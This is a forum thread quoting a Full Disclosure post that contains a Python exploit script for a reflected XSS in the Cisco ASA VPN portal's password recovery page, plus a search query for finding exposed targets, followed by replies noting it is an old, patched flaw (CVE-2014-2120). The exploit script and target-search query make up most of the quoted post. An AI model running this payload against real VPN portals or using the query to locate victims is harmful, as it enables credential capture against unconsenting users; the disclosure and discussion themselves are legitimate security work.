So my company blocks this page so I can't check it out much, but this is the email that was forwarded to me
Subject: [FD] Cisco ASA VPN - Zero Day Exploit
Message-ID:
<CANYkwVJZ7B8tzM5t8KWRV+zCnb65JY0+TKV7VYQ4XSBRPcLvQw@mail.gmail.com>
Content-Type: text/plain; charset=UTF-8
# Exploit author: Juan Sacco - jsacco@exploitpack.com # Affected program: Cisco ASA VPN Portal - Zero Day # Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's credentials.
# The password recovery form fails to filter properly the hidden inputs fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com # # Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016 # Cisco PSIRT report a CVE Feb 15/2016 # Exploit Pack disclose the bug Feb 15/2016 # Disclosure of the Exploit Feb 16/2016 # # Look for vulnerable targets here:
https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only
import string, sys
import socket, httplib
import telnetlib
def run():
try:
Target = sys.argv[1]
Port = int(sys.argv[2])
# Here goes your custom JS agent code
Payload = "alert(1)"
VulnerableURL =
"/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
+ Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
CraftedRequest = VulnerableURL
# Start the connection
connection = httplib.HTTPSConnection(Target) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data = Response.read() vulnerable = "Target is not vulnerable"
for line in str(data).splitlines():
if "juansacco\\\"" in line:
vulnerable = "Targer is vulnerable"
if vulnerable != "Not vulnerable":
print "Result of the test:", vulnerable
# Find the injection on the response
connection.close()
except Exception,e:
print "Exploit connection closed " + str(e)
if __name__ == '__main__':
print "Cisco VPN ASA Exploit - Zero Day"
print "################################"
print "Author: Juan Sacco - jsacco@exploitpack.com"
try:
Target = sys.argv[1]
Port = sys.argv[2]
except IndexError:
pass
run()
Paaaaaaaaaaaaaaaaaaaatch those ASAs running VPNs!
It's a Zero day, I don't think there is a patch yet :-(
Apparently this isn't really a 0 day, it's from 2014 or so.
Probably this one from 2013 - https://tools.cisco.com/security/center/viewAlert.x?alertId=30214
Juan Sacco is a pretty good researcher. Done some talks at big conferences so I wonder what is going on here. If it was a new XSS that is a 0day I would expect to see more coverage about it.
-Otanx
search on "Cisco PSIRT Feb 4/2016"
fist link is here
https://securityintelligence.com/news/danger-on-the-perimeter-about-the-cisco-asa-vulnerability/
click on the Cisco ASA Alert in that page and the reference is
Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability
so my quick google yields results that we've known about for a few days.
I could be wrong though.
Hitting up AS now..
Quote from: ristau5741 on February 19, 2016, 08:07:35 AM
Hitting up AS now..
This is not a new vulnerability. It was fixed and previously disclosed in 2014 and is just assigned CVE CVE-2014-2120:
https://tools.cisco.com/security/center/viewAlert.x?alertId=33406